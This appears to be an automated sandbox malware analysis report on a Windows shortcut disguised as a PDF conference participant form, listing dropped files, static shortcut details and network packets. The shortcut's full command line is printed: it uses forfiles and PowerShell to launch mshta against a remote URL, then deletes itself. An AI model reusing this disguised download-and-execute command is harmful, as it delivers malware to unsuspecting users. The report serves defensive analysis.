                                                                                                                                                                                          SHA-512:6ACB2FE99DA953194B8EADCD03EE0861A2E822D2F1BF2BB36F1E6FCDAD7A59F9C21F31D307654F565C9E16905AEA16F81F8CD55A55421A63D0D2318629C4346A
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.woof_authors li{. margin-top:7px !important;. list-style-type: none !important;.}..ul.woof_authors{. margin: 0 !important;. padding: 0 !important;.}..

                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\checkbox[1].css

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):9449
                                                                                                                                                                                          Entropy (8bit):4.756757398987589
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:192:dw+uqpCu0bwKgNMtdWa+cXSXY3JaYaXsl92hHfxwWTKfnL8:dw9MhKfnA
                                                                                                                                                                                          MD5:188CCDBEEA4D10DD60439F916DE74065
                                                                                                                                                                                          SHA1:DC35E3DD016EB92E17066B01CA62C0F9007EC08C
                                                                                                                                                                                          SHA-256:051E54F3529E73A270DF3EEC7B5141A20241AEF20E1146A564E635E5B99CA1C6
                                                                                                                                                                                          SHA-512:F2B8FB893B4B0E441D067F38DFEB8D9E42C1DDC5C002AB86E5F8373890F91DE78483816654E6639CB8B5409EFFB54864413BDEC879FD2164F31B84B6E3EFF559
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview::root {. --woof-sd-ie-ch_width: 25px;. --woof-sd-ie-ch_height: 25px;.. --woof-sd-ie-ch_space: 1px;. --woof-sd-ie-ch_space_color: #ffffff;.. --woof-sd-ie-ch_text_top: 0;. --woof-sd-ie-ch_text_color: #6d6d6d;. --woof-sd-ie-ch_hover_text_color: #333333;. --woof-sd-ie-ch_selected_text_color: #000000;. --woof-sd-ie-ch_font_size: 15px;. --woof-sd-ie-ch_font_family: inherit;. --woof-sd-ie-ch_font_weight: 400;. --woof-sd-ie-ch_hover_font_weight: 400;. --woof-sd-ie-ch_selected_font_weight: 400;. --woof-sd-ie-ch_line_height: 18px;. --woof-sd-ie-ch_side_padding: 0;... --woof-sd-ie-ch_color: #ffffff;. --woof-sd-ie-ch_hover_color: #79b8ff;. --woof-sd-ie-ch_selected_color: #79b8ff;. --woof-sd-ie-ch_image: url();. --woof-sd-ie-ch_selected_image: url();. --woof-sd-ie-ch_hover_image: url();. --woof-sd-ie-ch_hover_scale: 100;. --woof-sd-ie-ch_selected_scale: 100;.. --woof-sd-ie-ch_border_radius: 0;. --woof-sd-ie-ch_border_width:

                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\flatsome[1].css

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):145954
                                                                                                                                                                                          Entropy (8bit):5.104897906338081
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3072:Xq5/32FTXYK8Jm1LqCYDC8eliJN+w0dOeLWo0EADT+1zecyrNVuD:Z8eliJN+w0dOeLWo0EADT+1zecyrNVuD
                                                                                                                                                                                          MD5:56676AF37B8E946B1BF7587864A50D1B
                                                                                                                                                                                          SHA1:4E1C02E58A10B2AF1F2AD829E2FFEE454957BB92
                                                                                                                                                                                          SHA-256:8F8D0DF7656637D7D5DFF514745B1BC890013A71B6AB6AEFBE97E6FA1DA14984
                                                                                                                                                                                          SHA-512:D0F331ABA8A54F97B4A04E07AAF9EB19C8CE100FAC7029493547538251D44433FD39AFC5B48F3FB483F75B9B627239A3C931005B9A312840FD904EA02AD45CCF
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:@charset "utf-8";html{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;font-family:sans-serif}body{margin:0}article,aside,details,figcaption,figure,footer,header,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block}audio:not([controls]){display:none;height:0}progress{vertical-align:baseline}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline-width:0}abbr[title]{border-bottom:none;text-decoration:none}b,strong{font-weight:inherit;font-weight:bolder}dfn{font-style:italic}mark{background-color:#ff0;color:#000}small{display:inline-block;font-size:80%}img{border-style:none}svg:not(:root){overflow:hidden}button,input,select,textarea{font:inherit}optgroup{font-weight:700}button,input,select{overflow:visible}button,select{text-transform:none}[type=button],[type=reset],[type=submit],button{cursor:pointer}[disabled]{cursor:default}[type=reset],[type=submit],button,html [type=button]{-webkit-appearance:button}button

                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\front[1].css

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):4975
                                                                                                                                                                                          Entropy (8bit):4.852371334557799
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:96:FGKmF6FOdO3zbTrwFCrGTvWtbLwJsKZwJsK5VhFAESw3iF+RFXUCJ383C:FG3F6FOdODbTkF6G7WtbLwJsKZwJsKft
                                                                                                                                                                                          MD5:D76A67545EBE417C0692BF1EC0FE29D9
                                                                                                                                                                                          SHA1:D332488FA37ECF177C5FAA12398E74A9137B55C8
                                                                                                                                                                                          SHA-256:849D84CFB71A66AB93451B40DDBE4419A6034D7C90B0CF15D6EF9D5A4117F26E
                                                                                                                                                                                          SHA-512:10DC02BB9E1D025A19807568939E37BCD96272FDB33CF08348CD1CFDE3C7E49CBC3264F2EA332D7417AA976FBE497F7013397AB7FC0788087F48A76E79D6CA6E
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.woof_text_search_container .woof_text_search_go{. display: block;. width: 20px;. height: 20px;. margin-left: 3px;. background: url("../img/magnifying-glass2.svg");. display: none;. border: none !important;. text-decoration: none !important;. position: absolute;. right: 5px;. top: 5px;. z-index: 98;.}..woof_text_search_container .woof_container_inner{. position: relative;.}..woof_husky_txt{. width: 100%;. display: block;. height: auto;. position: relative;. margin-top: -1px;.}...woof_husky_txt-input{. width: 100%;. min-height: 30px;. /* background: #fff;. color: #777; */. margin-bottom: 0 !important;.}...woof_husky_txt-container{. font-family: sans-serif;. background: rgb(238, 238, 238);. border-radius: 2px;. border: solid 1px #eee;.. padding: 0;. width: inherit;. min-height: 1px;. max-height: 1px;. overflow: hidden;. position: absolute;. width: 100%;. z-index: 9999;. /* cursor:

                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\jquery.min[1].js

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                          File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):89684
                                                                                                                                                                                          Entropy (8bit):5.290619806745655
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:1536:SjjxXUHJnxDjoXEZxkMV4PYDt0zxxf6gP3f8cApoEGOzZTBvUsuy8WnKdXwhLQv1:SdeIygP3fulzcsz8jlvaDioQ47GKK
                                                                                                                                                                                          MD5:17738318D61D394F1DE8890D589AFAEC
                                                                                                                                                                                          SHA1:F6D0C4DC1399CF02D53F5753AD46573A8BBC2AC3
                                                                                                                                                                                          SHA-256:CC7403BAB52ED166E24EA9324241045AF370BE482F5B594468F4A6AC6E7E7981
                                                                                                                                                                                          SHA-512:242FFC23ED47553221460F601CB56C507E52A163E46AB9C89C3E39AB933A54FD326B2134D3E831DF7F32614329775A0C600F63BF54F4C5B8994F090C5FBA156F
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:/*! jQuery v3.6.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,y=n.hasOwnProperty,a=y.toString,l=a.call(Object),v={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct

                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\tooltip[1].css

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):735
                                                                                                                                                                                          Entropy (8bit):4.591792549870781
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12:DYmbPHW888SFXr+M+CNOlgwYti7jf0mPwQrfqY2gFKey15ktEKVEn:DYmbPjSFbxNK7FPT4gFKeycuKVE
                                                                                                                                                                                          MD5:BE1767D1176577B3242B17F4C8D81B02
                                                                                                                                                                                          SHA1:F9C426E610CA3C4D51E15AE5A5D339EE3242EA5F
                                                                                                                                                                                          SHA-256:A85627770160E545326D46B1E2FD9FA91B1B8AEE846E3982820E99F5178106C4
                                                                                                                                                                                          SHA-512:F7CF666EF6A051E01DEDFBF31C21DEAC2725CF732A3EA8208269E0494D32EE177741EDD259CED05EC13EFC417B0802779D08B93B0E60A097986C0B536B1F5BC4
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.woof-sd-tooltip {. position: relative;.}...woof-sd-tooltip .woof-sd-tooltiptext {. visibility: hidden;. min-width: 120px;. background-color: black;. color: #fff;. text-align: center;. border-radius: 6px;. padding: 5px 0;. position: absolute;. z-index: 999;. top: calc(100% + 6px);. left: 50%;. margin-left: -60px;. box-sizing: border-box;. display: block;.}...woof-sd-tooltip .woof-sd-tooltiptext::after {. content: "";. position: absolute;. bottom: 100%;. left: 50%;. margin-left: -5px;. border-width: 5px;. border-style: solid;. border-color: transparent transparent black transparent;.}...woof-sd-tooltip:hover .woof-sd-tooltiptext {. visibility: visible;.}..

                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):64
                                                                                                                                                                                          Entropy (8bit):1.1940658735648508
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:NlllulJnp/p:NllU
                                                                                                                                                                                          MD5:BC6DB77EB243BF62DC31267706650173
                                                                                                                                                                                          SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                                                                                                                                                                          SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                                                                                                                                                          SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:@...e.................................X..............@..........

                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mku24xam.rdi.psm1

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x4cjefny.qes.ps1

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                          C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):55
                                                                                                                                                                                          Entropy (8bit):4.306461250274409
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                                                          Static File Info

                                                                                                                                                                                          General

                                                                                                                                                                                          File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=13, Archive, ctime=Sat May 7 04:20:19 2022, mtime=Fri Oct 4 14:00:18 2024, atime=Sat May 7 04:20:19 2022, length=41472, window=hidenormalshowminimized
                                                                                                                                                                                          Entropy (8bit):2.8642498393846507
                                                                                                                                                                                          TrID:
                                                                                                                                                                                          • Windows Shortcut (20020/1) 100.00%
                                                                                                                                                                                          File name:T15hf0Y3mp.lnk
                                                                                                                                                                                          File size:3'236 bytes
                                                                                                                                                                                          MD5:558ed2a75be9da451504b5ef33eed93c
                                                                                                                                                                                          SHA1:4c9e126b112ac8c76029e062dbd7d31569e0ce57
                                                                                                                                                                                          SHA256:b8d97d29e99e1f96e06836468db56855dc09305e3ed663c720fe700ea4bf6e73
                                                                                                                                                                                          SHA512:3e6ae11d93a58e361a23a5272bc4cc93a266b6cf6fe90daf80617cc7622e7b8d6d4af9b836acf9b5ca71e865bab9c3a773acc860c27fb71736b5f7060b5aad4f
                                                                                                                                                                                          SSDEEP:24:8WCF53OiuuezcHJBknl2hN+/4FdSL/Yb257YcgjBl2heYkdd79ds8JermllSoHmQ:8dki1JSlNwKJg9lokdJ9veSljHL
                                                                                                                                                                                          TLSH:DF61E11127E50B29F3F347719D7AA5318A7BFD259972CF1F029007480871A00A964F77
                                                                                                                                                                                          File Content Preview:L..................F.@.. .....s$.a...Uq n.....s$.a..........................E....P.O. .:i.....+00.../C:\...................V.1.....8Y;...Windows.@........T,*GYYE..............................W.i.n.d.o.w.s.....Z.1.....GY.>0.System32..B........T,*GY.>....B.

                                                                                                                                                                                          File Icon

                                                                                                                                                                                          Icon Hash:696951d5dddb4965

                                                                                                                                                                                          Static Windows Shortcut Info

                                                                                                                                                                                          General

                                                                                                                                                                                          Relative Path:..\..\..\Windows\System32\forfiles.exe
                                                                                                                                                                                          Command Line Argument:/p C:\ /m Windows /c "powershell . \*i*\*2\msh*e https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2;$eCRg = Get-Location;$eCRg = Join-Path $eCRg 'GIE Annual Conference 2024 in Munich Participant Form Event Agency.pdf.lnk';del $eCRg
                                                                                                                                                                                          Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                                                                                                                                                                          Network Behavior

                                                                                                                                                                                          Network Port Distribution

                                                                                                                                                                                          TCP Packets

                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                          Oct 27, 2024 07:35:03.376946926 CET49730443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:03.376961946 CET44349730185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:03.377054930 CET49730443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:03.386713982 CET49730443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:03.386730909 CET44349730185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:04.299876928 CET44349730185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:04.299981117 CET49730443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:04.343466043 CET49730443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:04.343482018 CET44349730185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:04.343950987 CET44349730185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:04.344155073 CET49730443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:04.346482038 CET49730443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:04.387330055 CET44349730185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:05.063214064 CET44349730185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:05.063241005 CET44349730185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:05.063287973 CET44349730185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:05.063532114 CET49730443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:05.063532114 CET49730443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:05.063553095 CET44349730185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:05.063905001 CET49730443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:05.076493025 CET49731443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:05.076512098 CET44349731185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:05.077136040 CET49731443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:05.085203886 CET49731443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:05.085226059 CET44349731185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:05.180598974 CET44349730185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:05.180619955 CET44349730185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:05.180707932 CET49730443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:05.180727959 CET44349730185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:05.180738926 CET49730443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:05.183594942 CET49730443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:05.299069881 CET44349730185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:05.299130917 CET44349730185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:05.299163103 CET49730443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:05.299177885 CET44349730185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:05.299195051 CET49730443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:05.299228907 CET49730443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:05.416680098 CET44349730185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:05.416733027 CET44349730185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:05.416872978 CET49730443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:05.416891098 CET49730443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:05.416904926 CET44349730185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:05.417054892 CET49730443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:05.534785986 CET44349730185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:05.534842968 CET44349730185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:05.534909010 CET49730443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:05.534929037 CET44349730185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:05.534944057 CET49730443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:05.535372019 CET49730443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:05.571641922 CET44349730185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:05.571810961 CET44349730185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:05.571891069 CET49730443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:05.571906090 CET44349730185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:05.571937084 CET44349730185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:05.572027922 CET49730443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:05.572027922 CET49730443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:05.590265989 CET49730443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:05.590282917 CET44349730185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:05.591121912 CET49732443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:05.591131926 CET44349732185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:05.591206074 CET49732443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:05.591393948 CET49732443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:05.591402054 CET44349732185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:06.801204920 CET44349732185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:06.801345110 CET49732443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:06.801943064 CET49732443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:06.801951885 CET44349732185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:06.802087069 CET49732443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:06.802089930 CET44349732185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:06.803661108 CET44349731185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:06.803749084 CET49731443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:06.803992033 CET49731443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:06.804004908 CET44349731185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:06.804070950 CET49731443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:06.804086924 CET44349731185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:07.076241970 CET44349732185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:07.076270103 CET44349732185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:07.076339006 CET44349732185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:07.076359034 CET49732443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:07.076359034 CET49732443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:07.076741934 CET49732443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:07.076936960 CET44349731185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:07.077090979 CET44349731185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:07.077111006 CET49731443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:07.077254057 CET49731443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:07.078479052 CET49731443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:07.078500986 CET44349731185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:07.078865051 CET49732443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:07.078876019 CET44349732185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:07.081867933 CET49733443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:07.081897020 CET44349733185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:07.081973076 CET49733443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:07.082190037 CET49734443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:07.082211018 CET44349734185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:07.082282066 CET49734443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:07.083170891 CET49733443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:07.083189964 CET44349733185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:07.083525896 CET49734443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:07.083543062 CET44349734185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:07.977247000 CET44349733185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:07.977329016 CET49733443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:07.978523970 CET49733443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:07.978533030 CET44349733185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:07.978692055 CET49733443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:07.978697062 CET44349733185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:07.980803013 CET44349734185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:07.980884075 CET49734443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:07.981138945 CET49734443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:07.981154919 CET44349734185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:07.981272936 CET49734443192.168.2.4185.68.16.189
                                                                                                                                                                                          Oct 27, 2024 07:35:07.981281996 CET44349734185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:08.255187988 CET44349734185.68.16.189192.168.2.4
                                                                                                                                                                                          Oct 27, 2024 07:35:08.255259037 CET44349734185.68.16.189192.168.2.4
